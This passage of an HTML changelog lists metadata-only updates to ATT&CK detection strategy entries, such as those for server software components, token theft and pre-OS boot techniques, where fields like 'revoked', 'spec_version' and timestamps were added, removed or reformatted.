collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.682000+00:00</td></tr></tbody></table></details><hr><h4>[DET0547] Detection Strategy for T1505 - Server Software Component</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.672000+00:00</td></tr></tbody></table></details><hr><h4>[DET0166] Detection Strategy for T1505.002 - Transport Agent Abuse (Windows/Linux)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.685000+00:00</td></tr></tbody></table></details><hr><h4>[DET0068] Detection Strategy for T1505.004 - Malicious IIS Components</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.674000+00:00</td></tr></tbody></table></details><hr><h4>[DET0212] Detection Strategy for T1505.005 – Terminal Services DLL Modification (Windows)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.694000+00:00</td></tr></tbody></table></details><hr><h4>[DET0334] Detection Strategy for T1525 – Implant Internal Image</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.691000+00:00</td></tr></tbody></table></details><hr><h4>[DET0515] Detection Strategy for T1528 - Steal Application Access Token</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.678000+00:00</td></tr></tbody></table></details><hr><h4>[DET0278] Detection Strategy for T1542 Pre-OS Boot</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.688000+00:00</td></tr></tbody></table></details><hr><h4>[DET0099] Detection Strategy for T1542.001 Pre-OS Boot: System Firmware</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.696000+00:00</td></tr></tbody></table></details><hr><h4>[DET0323] Detection Strategy for T1542.002 Pre-OS Boot: Component Firmware</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.686000+00:00</td></tr></tbody></table></details><hr><h4>[DET0175] Detection Strategy for T1542.004 Pre-OS Boot: ROMMONkit</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.691000+00:00</td></tr></tbody></table></details><hr><h4>[DET0582] Detection Strategy for T1542.005 Pre-OS Boot: TFTP Boot</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.684000+00:00</td></tr></tbody></table></details><hr><h4>[DET0330] Detection Strategy for T1546.016 - Event Triggered Execution via Installer Packages</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.667000+00:00</td></tr></tbody></table></details><hr><h4>[DET0375] Detection Strategy for T1546.017 - Udev Rules (Linux)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.675000+00:00</td></tr></tbody></table></details><hr><h4>[DET0180] Detection Strategy for T1547.009 – Shortcut Modification (Windows)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.673000+00:00</td></tr></tbody></table></details><hr><h4>[DET0204] Detection Strategy for T1547.010 – Port Monitor DLL Persistence via spoolsv.exe (Windows)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.687000+00:00</td></tr></tbody></table></details><hr><h4>[DET0121] Detection Strategy for T1547.015 – Login Items on macOS</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: 